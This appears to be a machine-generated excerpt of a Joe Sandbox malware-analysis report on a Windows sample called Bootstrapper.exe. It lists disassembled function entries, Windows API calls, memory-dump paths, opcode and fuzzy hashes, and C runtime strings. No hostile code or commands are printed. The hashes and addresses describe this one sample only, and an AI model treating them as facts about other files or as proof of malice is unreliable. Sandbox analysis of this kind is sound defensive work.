                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$N$O$;
                                                                                • API String ID: 0-3489239494
                                                                                • Opcode ID: 2cd1a18a9d19744a0948724d4435652df9e4fcb6b01669fb05e4281edfd1d61e
                                                                                • Instruction ID: c1073304162ad482e64cd411a82972f9db2ccd19eaf0950ce2625543301afb8c
                                                                                • Opcode Fuzzy Hash: 2cd1a18a9d19744a0948724d4435652df9e4fcb6b01669fb05e4281edfd1d61e
                                                                                • Instruction Fuzzy Hash: 0CC22475D002698FCB18CFA9D8906ECBBF1FB58310F14826AE489EB395E7385945CF54
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0077C67B
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0077C74B
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0077C777
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0077C781
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                • String ID:
                                                                                • API String ID: 254469556-0
                                                                                • Opcode ID: ebb915f776cfd66cba3e44dd315484be5f84fcd946d8ddb2c78479c877eccfdc
                                                                                • Instruction ID: adc62a97fa48509b17e07dfbddfd1001c3c219ae82e2a7d53bdaca445bd70997
                                                                                • Opcode Fuzzy Hash: ebb915f776cfd66cba3e44dd315484be5f84fcd946d8ddb2c78479c877eccfdc
                                                                                • Instruction Fuzzy Hash: 433114B8D05328DADF21DF60D9497DDBBB4AF58304F0081E9E80D6A241EBB95A89CF45
                                                                                APIs
                                                                                • FindFirstFileExW.KERNEL32(00000000,?,D8E815C3), ref: 0079519B
                                                                                • std::_Timevec::_Timevec.LIBCPMTD ref: 007951A8
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0079533D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextTimevecTimevec::_std::_
                                                                                • String ID:
                                                                                • API String ID: 2141543823-0
                                                                                • Opcode ID: 03ad175f418ae0cf9b98c561aef7ee58284cd1455a99416b719d911df03fe7c2
                                                                                • Instruction ID: 58ead476765fbdc3295937b142d3803a65db0b0e327caf8040ba575f8c603c69
                                                                                • Opcode Fuzzy Hash: 03ad175f418ae0cf9b98c561aef7ee58284cd1455a99416b719d911df03fe7c2
                                                                                • Instruction Fuzzy Hash: 0BA10A71904528DBDF65EF24DC99BEEB376AB44300F5042E9E40E67291EB386E85CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4
                                                                                • API String ID: 0-4088798008
                                                                                • Opcode ID: 556265f884e4de0f315e6bc78bfb51e9724556ae7c02ca3d1518935b8a392b45
                                                                                • Instruction ID: 917ff97cb91eaabee2797607f79106d06d7a9bef14283dd47e2076fd9bedfbc7
                                                                                • Opcode Fuzzy Hash: 556265f884e4de0f315e6bc78bfb51e9724556ae7c02ca3d1518935b8a392b45
                                                                                • Instruction Fuzzy Hash: 00030175E00259CFCB54CFA9E890AECBBF1FB58311B14826AE858EB351E7389941CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: [Y$[Y
                                                                                • API String ID: 0-2744515570
                                                                                • Opcode ID: 44ecf7cbd7d882a00a1ff31c3a22c1fd53be6186d4e77e501627276bb46e1d7a
                                                                                • Instruction ID: a774b6bb11e86cc7d4064af91c648d126f34213933a2b2d5eb01e055db051a18
                                                                                • Opcode Fuzzy Hash: 44ecf7cbd7d882a00a1ff31c3a22c1fd53be6186d4e77e501627276bb46e1d7a
                                                                                • Instruction Fuzzy Hash: B9B16172A08BC58FC715CA7CC8456BEBFA16F57220B1D839CD6A59B3D2C6294806C761
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,D8E815C3), ref: 007856A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 31276548-0
                                                                                • Opcode ID: 0a2fa6abce9b7ae8867a72a56779afe2af970b4874beeaf2d244dc41a37f45f7
                                                                                • Instruction ID: 702dc0ff86b4ebfde15eb20cdc57fc34c121c4b522bbd3c75662cc1a476ab75a
                                                                                • Opcode Fuzzy Hash: 0a2fa6abce9b7ae8867a72a56779afe2af970b4874beeaf2d244dc41a37f45f7
                                                                                • Instruction Fuzzy Hash: 0B319E75D45658DFCF14CFA8C880AEEBBB5BB49310F20826AD419A7250E7396941CB64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TWVI
                                                                                • API String ID: 0-4013521978
                                                                                • Opcode ID: 47e6841103e724b16697dd6627fc2db25552b24e02dea986c2b3eeed16aa7ae9
                                                                                • Instruction ID: 1d959e9678917edf7a0aa032a71ef81800dbd4e15368511eb0c3a57e64be3bde
                                                                                • Opcode Fuzzy Hash: 47e6841103e724b16697dd6627fc2db25552b24e02dea986c2b3eeed16aa7ae9
                                                                                • Instruction Fuzzy Hash: 15612632A042145BDB209F28C8C077BB792ABD9724F19857DDBD89B391E7398C42CBC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a89511a2babab4854ca0d321ff468ea6fad8389695e18cdf6cd13c96795c7cbd
                                                                                • Instruction ID: 49deb869c17c65fcac310db2eeaafa9d50e661e6119c48f72155ffc506073e9d
                                                                                • Opcode Fuzzy Hash: a89511a2babab4854ca0d321ff468ea6fad8389695e18cdf6cd13c96795c7cbd
                                                                                • Instruction Fuzzy Hash: DC52B3316083458FCB14CF28C090BAABBE1BF86314F998A7DE8D957342D779E945CB85
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 309dc27259ee14ec91676eaac6efe7ad7bceeedbc01e2f1bc8baeb2b0c82d24f
                                                                                • Instruction ID: 92e3c6fef9b588879d9a030dcd764802364261bfcf77061f76917bd9a10069d3
                                                                                • Opcode Fuzzy Hash: 309dc27259ee14ec91676eaac6efe7ad7bceeedbc01e2f1bc8baeb2b0c82d24f
                                                                                • Instruction Fuzzy Hash: D412B432608B118BC734DF18D880BABB3E2FFD4315F598A2DD5C697241D779B8958B81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0df0a02bacb4f98860999bf3be8079696e2c0c4e7ea2eb099f5fae698be4eaf8
                                                                                • Instruction ID: a188d04d7d64b2d454bf82f53dade2010f3f2f34f17a32db098d94eded83b5aa
                                                                                • Opcode Fuzzy Hash: 0df0a02bacb4f98860999bf3be8079696e2c0c4e7ea2eb099f5fae698be4eaf8
                                                                                • Instruction Fuzzy Hash: 3AC159B2A587418FC360CF28DC96BABB7F1BF85318F08492DD1D9C6242E778A155CB46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d0c1970e8c814da268cfb7a6fe5cf92124f194da7cb2e521d7c822092c66475
                                                                                • Instruction ID: 34acd5448150d5359e29282d332a08454151c70c339e366391cd20939782f631
                                                                                • Opcode Fuzzy Hash: 9d0c1970e8c814da268cfb7a6fe5cf92124f194da7cb2e521d7c822092c66475
                                                                                • Instruction Fuzzy Hash: 536126377599824BE729893C5C112A67A934BD3334B3DC77BE5B2CB3E5E9688C428340
                                                                                APIs
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F0FE
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F10E
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F119
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F176
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F181
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F18C
                                                                                • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 0077F1B5
                                                                                  • Part of subcall function 00780300: type_info::operator==.LIBVCRUNTIMED ref: 0078033D
                                                                                • ___DestructExceptionObject.LIBCMTD ref: 0077F1CA
                                                                                • std::bad_alloc::bad_alloc.LIBCMTD ref: 0077F1D8
                                                                                  • Part of subcall function 0077FA20: std::exception::exception.LIBCMTD ref: 0077FA31
                                                                                  • Part of subcall function 00780790: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00000000), ref: 0078082A
                                                                                • _Smanip.LIBCPMTD ref: 0077F1FE
                                                                                • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0077F288
                                                                                • weak_ptr.LIBCPMTD ref: 0077F2DF
                                                                                • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 0077F2EB
                                                                                • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0077F2F5
                                                                                • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0077F301
                                                                                • CatchIt.LIBCMTD ref: 0077F3AB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                                                                                • String ID: csm$csm$csm$C
                                                                                • API String ID: 2995349249-3954603546
                                                                                • Opcode ID: 15e81cebda25780b0dcb7a2e6b00052036e41fb8d11c8005c36ed7f2f045178c
                                                                                • Instruction ID: b9384c74b00b59698c5ea5ad9f1e1b2c494d9a0976b35ac03a942a16ae2480b0
                                                                                • Opcode Fuzzy Hash: 15e81cebda25780b0dcb7a2e6b00052036e41fb8d11c8005c36ed7f2f045178c
                                                                                • Instruction Fuzzy Hash: 00F170B5900209DBCF18EFA4C9859AF77B5BF54384F50C128F9199B242DB38EA45CBE1
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00791350
                                                                                • __invoke_watson_if_error.LIBCMTD ref: 007913F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule__invoke_watson_if_error
                                                                                • String ID: (*_errno())$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")$xz$%{$z
                                                                                • API String ID: 3976807648-2747226696
                                                                                • Opcode ID: f5edff6f9fce220f37477a23c133c2da9e12f927312cfa2d166f1b18e7c723ed
                                                                                • Instruction ID: f9a58a22bab91ffce0f7c3eaacaff9e7e455aae6f9798ec7aa7757ceab1ee889
                                                                                • Opcode Fuzzy Hash: f5edff6f9fce220f37477a23c133c2da9e12f927312cfa2d166f1b18e7c723ed
                                                                                • Instruction Fuzzy Hash: 4CD19DB0D0022ADBDF24DF10EC4DBDA77B1ABA9304F4141E9E60966281D7789EE5CF91
                                                                                APIs
                                                                                • __aligned_msize.LIBCMTD ref: 0079C2EF
                                                                                • __invoke_watson_if_error.LIBCMTD ref: 0079C30E
                                                                                Strings
                                                                                • fp_format_e_internal, xrefs: 0079C1DF, 0079C303
                                                                                • e+000, xrefs: 0079C2E2
                                                                                • %ls, xrefs: 0079C199
                                                                                • strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), ", xrefs: 0079C308
                                                                                • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0079C1A2, 0079C1DA, 0079C2FE
                                                                                • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 0079C194, 0079C1E4
                                                                                • d, xrefs: 0079C36D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: __aligned_msize__invoke_watson_if_error
                                                                                • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
                                                                                • API String ID: 4254006664-2583523412
                                                                                • Opcode ID: 44dd291077e40a019cae99c8fdfc7e349ed7dd42699d282a13b98106add5a819
                                                                                • Instruction ID: 33fdb8d199439be89fc899bf5096fc2d9516a9a22df590f6a217e401676b8856
                                                                                • Opcode Fuzzy Hash: 44dd291077e40a019cae99c8fdfc7e349ed7dd42699d282a13b98106add5a819
                                                                                • Instruction Fuzzy Hash: 1BA130B0E04248EFCF05CF98D995BADBBB1BF49304F248199E4156B382C778AE40DB55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr$Cz$Cz
                                                                                • API String ID: 0-2783138576
                                                                                • Opcode ID: c552fa18fe2bca4f3e329bd1aacea3d8cadf79371d7cc6505cd96c21ef133b15
                                                                                • Instruction ID: bd70d100253f50024a0b8c433b9fa4986c9e3ca88aede30b2c3359e40f9c9f5c
                                                                                • Opcode Fuzzy Hash: c552fa18fe2bca4f3e329bd1aacea3d8cadf79371d7cc6505cd96c21ef133b15
                                                                                • Instruction Fuzzy Hash: ACB17C70A00209DFDB14DFA8D885BBE77B1FFC6314F208619E925AB281D7B9AD41CB51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %ls$C:\Users\user\Desktop\Bootstrapper.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                                                                                • API String ID: 0-946240980
                                                                                • Opcode ID: 5d319b214ed45446aaef1b58aec48f212514931cb27c4a1c8c528076c162c00a
                                                                                • Instruction ID: 4f04517d8d7eaa302c6a704181a86248f1848fc68b4cdf3f07e8e376628916a4
                                                                                • Opcode Fuzzy Hash: 5d319b214ed45446aaef1b58aec48f212514931cb27c4a1c8c528076c162c00a
                                                                                • Instruction Fuzzy Hash: D9816EB1D40208DBDB04FFD4DC5ABEEB7B8BF54304F904529E505AB281EB786946CBA1
                                                                                APIs
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F597
                                                                                • ___vcrt_getptd.LIBVCRUNTIMED ref: 0077F5A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ___vcrt_getptd
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 984050374-2084237596
                                                                                • Opcode ID: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
                                                                                • Instruction ID: 9a2039e50da1ee5e0958e63f3e46c2123a70e539f6145f2701a2018f4441c7d7
                                                                                • Opcode Fuzzy Hash: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
                                                                                • Instruction Fuzzy Hash: B5515271A00109EBCF04DF98DA85EEE73B9AF48340F14C169F909A7291D738ED51CBA1
                                                                                APIs
                                                                                • HeapSize.KERNEL32(?,00000000,00000000), ref: 0079B524
                                                                                • HeapReAlloc.KERNEL32(?,00000010,00000000,?), ref: 0079B559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
